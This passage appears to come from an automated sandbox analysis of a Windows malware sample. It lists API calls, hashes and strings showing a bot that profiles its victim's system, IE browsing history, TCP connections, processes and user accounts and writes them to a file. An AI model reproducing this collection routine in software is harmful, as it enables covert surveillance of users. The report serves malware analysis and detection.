                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,7763FFB0,?,?,?,?,?,012F7967,00000000,?,00000000), ref: 013049AD
                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,012F7967,?,?,?,?,?,012F7967,00000000,?,00000000), ref: 013049CA
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,012F7967,00000000,?,00000000), ref: 013049E2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,012F7967,00000000), ref: 013049F3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess$CloseInformationOpenTimes
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3228293703-0
                                                                                                                                                                                                              • Opcode ID: 4efa2f671a57dcb1ced5849cbdf7c0fc39aff5d670758c0efe371fd79d09588f
                                                                                                                                                                                                              • Instruction ID: e20a2241feae82e5aa2b865e5c20ba4eb074b4ca268b9da71dc1b03c3c1aebf5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4efa2f671a57dcb1ced5849cbdf7c0fc39aff5d670758c0efe371fd79d09588f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA11EFB1D00219ABDB119F9AC8849EFFBFCEF98644F10815AEA05A7141D77096458BA0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 486 12f77c0-12f77de CreateThread 487 12f7803-12f7805 ExitThread 486->487 488 12f77e0-12f77f4 GetHandleInformation 486->488 488->487 489 12f77f6-12f77fa 488->489 489->487 490 12f77fc-12f77fd CloseHandle 489->490 490->487
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012F6CA0,00000000,00000000,00000000), ref: 012F77D4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F77EC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F77FD
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 012F7805
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleThread$CloseCreateExitInformation
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4233414108-0
                                                                                                                                                                                                              • Opcode ID: 6cc53e8dc69a8acbf4321e9452e1b3753f606f616d411c450c60b3b56027aa29
                                                                                                                                                                                                              • Instruction ID: e69b4fa0e40bb0d6309b1e37efaa687f873799b1696ca6453374032700d3a482
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cc53e8dc69a8acbf4321e9452e1b3753f606f616d411c450c60b3b56027aa29
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9E06D30A55315BBF7316A95CD0EF9EBAACAB01F01F20412CFB00AA0C1D7A0AA00D7A5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,?,0133D3A4,775B5CE0), ref: 012E4C37
                                                                                                                                                                                                                • Part of subcall function 013059D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 013059EE
                                                                                                                                                                                                                • Part of subcall function 013059D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,012E4C50,?,?,012E4C50,?,00000001), ref: 01305A0B
                                                                                                                                                                                                                • Part of subcall function 013059D0: SetNamedSecurityInfoA.ADVAPI32(?,012E4C50,00000010,00000000,00000000,00000000,00000001), ref: 01305A26
                                                                                                                                                                                                                • Part of subcall function 013059D0: LocalFree.KERNEL32(?,?,?,012E4C50,?,00000001), ref: 01305A37
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000001), ref: 012E4C5E
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 012E4C6F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{BotVer: ,00000009,012E3F9D,00000000), ref: 012E4C7F
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000009,00000000), ref: 012E4C90
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4CA4
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000005,00000000), ref: 012E4CB1
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,4.1.2,00000005,00000000,00000000), ref: 012E4CC1
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000005,00000000), ref: 012E4CD2
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4CE6
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E4CF3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E4D03
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000002,00000000), ref: 012E4D14
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 012E4D28
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4D3C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000A,00000000), ref: 012E4D49
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Process: ,0000000A,00000000,00000000), ref: 012E4D59
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,0000000A,00000000), ref: 012E4D6A
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4D9C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E4DAB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E4DBF
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 012E4DD2
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4DE6
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E4DF3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E4E03
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E4E14
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 012E4E25
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4E39
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 012E4E46
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Username: ,0000000B,00000000,00000000), ref: 012E4E56
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 012E4E67
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4E92
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E4EA1
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E4EB5
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E4EC8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4EDC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E4EE9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E4EF9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E4F0A
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(PROCESSOR_IDENTIFIER,?,00000104), ref: 012E4F21
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4F35
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 012E4F42
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Processor: ,0000000C,00000000,00000000), ref: 012E4F52
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 012E4F63
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4F8E
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E4F9D
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E4FB1
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E4FC4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4FD8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E4FE5
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E4FF5
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E5006
                                                                                                                                                                                                              • GetSystemDefaultLangID.KERNEL32 ref: 012E500C
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000104), ref: 012E5026
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5093
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 012E50A0
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Language: ,0000000B,00000000,00000000), ref: 012E50B0
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 012E50C1
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E50EC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E50FB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E510F
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E5122
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5136
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E5143
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E5153
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E5164
                                                                                                                                                                                                              • GetDC.USER32(00000000,0000000C), ref: 012E516E
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 012E5175
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000001,00000000), ref: 012E517E
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000000,00000000), ref: 012E5187
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%dx%d@%d,00000000), ref: 012E519F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E51B6
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 012E51C3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Screen: ,00000009,00000000,00000000), ref: 012E51D3
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 012E51E4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E520F
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E521E
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E5232
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E5245
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5259
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E5266
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E5276
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E5287
                                                                                                                                                                                                              • GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd:MMM:yyyy,?,00000104), ref: 012E52A7
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E52BB
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 012E52C8
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Date: ,00000007,00000000,00000000), ref: 012E52D8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 012E52E9
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5314
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E5323
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E5337
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E534A
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E535E
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E536B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E537B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E538C
                                                                                                                                                                                                              • GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH:mm:ss,?,00000104), ref: 012E53AC
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E53C0
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 012E53CD
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Local time: ,0000000D,00000000,00000000), ref: 012E53DD
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 012E53EE
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E541C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E542B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E543F
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E5452
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5466
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E5473
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E5483
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E5494
                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 012E54A1
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%c%d:%02d,?,?,?), ref: 012E5502
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5519
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 012E5526
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{GMT: ,00000006,00000000,00000000), ref: 012E5536
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 012E5547
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5572
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E5581
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E5595
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E55A8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E55BC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E55C9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E55D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E55EA
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E55FE
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 012E560B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Uptime: ,00000009,00000000,00000000), ref: 012E561B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 012E562C
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E566C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012E567B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012E568C
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 012E569F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E56B3
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E56C0
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E56D0
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E56E1
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 012E56F3
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5707
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 012E5714
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Windows directory: ,00000014,00000000,00000000), ref: 012E5724
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 012E5735
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5760
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E576F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E5783
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E5796
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E57AA
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E57B7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E57C7
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E57D8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E57EC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 012E57F9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Administrator: ,00000010,00000000,00000000), ref: 012E5809
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 012E581A
                                                                                                                                                                                                              • #680.SHELL32 ref: 012E5820
                                                                                                                                                                                                              • #680.SHELL32 ref: 012E5843
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5875
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012E5884
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012E5895
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012E58A8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E58BC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E58C8
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E58D8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E58E6
                                                                                                                                                                                                                • Part of subcall function 012E4900: RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 012E4925
                                                                                                                                                                                                                • Part of subcall function 012E4900: _snprintf.MSVCRT(?,00000104,url%i,00000001), ref: 012E494D
                                                                                                                                                                                                                • Part of subcall function 012E4900: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,774D3490), ref: 012E4987
                                                                                                                                                                                                                • Part of subcall function 012E4900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E49A9
                                                                                                                                                                                                                • Part of subcall function 012E4900: LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 012E49B5
                                                                                                                                                                                                                • Part of subcall function 012E4900: WriteFile.KERNEL32(00000000,IE history:,0000000C,012E58F1,00000000), ref: 012E49C9
                                                                                                                                                                                                                • Part of subcall function 012E4900: UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 012E49D7
                                                                                                                                                                                                                • Part of subcall function 012E4900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E49EB
                                                                                                                                                                                                                • Part of subcall function 012E4900: LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 012E49F7
                                                                                                                                                                                                                • Part of subcall function 012E4900: WriteFile.KERNEL32(00000000,01325C1C,00000001,00000000,00000000), ref: 012E4A0B
                                                                                                                                                                                                                • Part of subcall function 012E4900: UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 012E4A19
                                                                                                                                                                                                                • Part of subcall function 012E4180: GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,774D3490), ref: 012E419D
                                                                                                                                                                                                                • Part of subcall function 012E4180: HeapAlloc.KERNEL32(00000000), ref: 012E41A0
                                                                                                                                                                                                                • Part of subcall function 012E4180: memset.MSVCRT(00000000,00000000,00000C10), ref: 012E41B4
                                                                                                                                                                                                                • Part of subcall function 012E4180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 012E4224
                                                                                                                                                                                                                • Part of subcall function 012E4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E4232
                                                                                                                                                                                                                • Part of subcall function 012E4180: HeapValidate.KERNEL32(00000000), ref: 012E4235
                                                                                                                                                                                                                • Part of subcall function 012E4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E4242
                                                                                                                                                                                                                • Part of subcall function 012E4180: HeapFree.KERNEL32(00000000), ref: 012E4245
                                                                                                                                                                                                                • Part of subcall function 012E4180: GetProcessHeap.KERNEL32(00000008,00000BED), ref: 012E425D
                                                                                                                                                                                                                • Part of subcall function 012E4180: HeapAlloc.KERNEL32(00000000), ref: 012E4260
                                                                                                                                                                                                                • Part of subcall function 012E4180: memset.MSVCRT(00000000,00000000,00000BED), ref: 012E4270
                                                                                                                                                                                                                • Part of subcall function 012E4180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 012E428A
                                                                                                                                                                                                                • Part of subcall function 012E4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E4297
                                                                                                                                                                                                                • Part of subcall function 012E4180: HeapValidate.KERNEL32(00000000), ref: 012E429A
                                                                                                                                                                                                                • Part of subcall function 012E4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E42AB
                                                                                                                                                                                                                • Part of subcall function 012E4180: HeapFree.KERNEL32(00000000), ref: 012E42AE
                                                                                                                                                                                                                • Part of subcall function 012E44D0: memset.MSVCRT(?,00000000,00000124,00000000,00000000,774D3490), ref: 012E4503
                                                                                                                                                                                                                • Part of subcall function 012E44D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,774D3490), ref: 012E450E
                                                                                                                                                                                                                • Part of subcall function 012E44D0: Process32First.KERNEL32 ref: 012E4531
                                                                                                                                                                                                                • Part of subcall function 012E44D0: GetHandleInformation.KERNEL32(00000000,?), ref: 012E454D
                                                                                                                                                                                                                • Part of subcall function 012E44D0: CloseHandle.KERNEL32(00000000), ref: 012E4567
                                                                                                                                                                                                                • Part of subcall function 012E4710: NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,00000000,774D3490,?,?,?,?,012E5903,00000000), ref: 012E475A
                                                                                                                                                                                                                • Part of subcall function 012E4710: GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,012E5903,00000000,00000000,00000000), ref: 012E47A5
                                                                                                                                                                                                                • Part of subcall function 012E4710: HeapAlloc.KERNEL32(00000000,?,?,?,?,012E5903,00000000,00000000,00000000), ref: 012E47AC
                                                                                                                                                                                                                • Part of subcall function 012E4710: memset.MSVCRT(00000000,00000000,012E5903,?,?,?,?,012E5903,00000000,00000000,00000000), ref: 012E47BF
                                                                                                                                                                                                                • Part of subcall function 012E4710: _snprintf.MSVCRT(00000001,00000001,%S,00000001,?,?,?,?,012E5903,00000000,00000000), ref: 012E480A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012E5913
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012E5924
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$LockPointerUnlockWrite$Heap$Process$memset$HandleInformationSecuritySystem_snprintf$AllocDescriptorFree$#680CloseCreateFormatMetricsNameQueryTableTimeValidate$CapsConvertDateDefaultDeviceDirectoryDisplayEnvironmentFirstInfoLangLocalModuleNamedOpenProcess32SaclSnapshotStringToolhelp32UserValueVariableWindowsZone
                                                                                                                                                                                                              • String ID: %c%d:%02d$%dx%d@%d$4.1.2$HH:mm:ss$PROCESSOR_IDENTIFIER$XXX$dd:MMM:yyyy$false$true${Administrator: ${BotVer: ${Date: ${GMT: ${Language: ${Local time: ${Process: ${Processor: ${Screen: ${Uptime: ${Username: ${Windows directory:
                                                                                                                                                                                                              • API String ID: 1724122771-2715564829
                                                                                                                                                                                                              • Opcode ID: b704a4a710b00d31fee7d81c8b50712889c96b69eac4fa8b853af867c046acf3
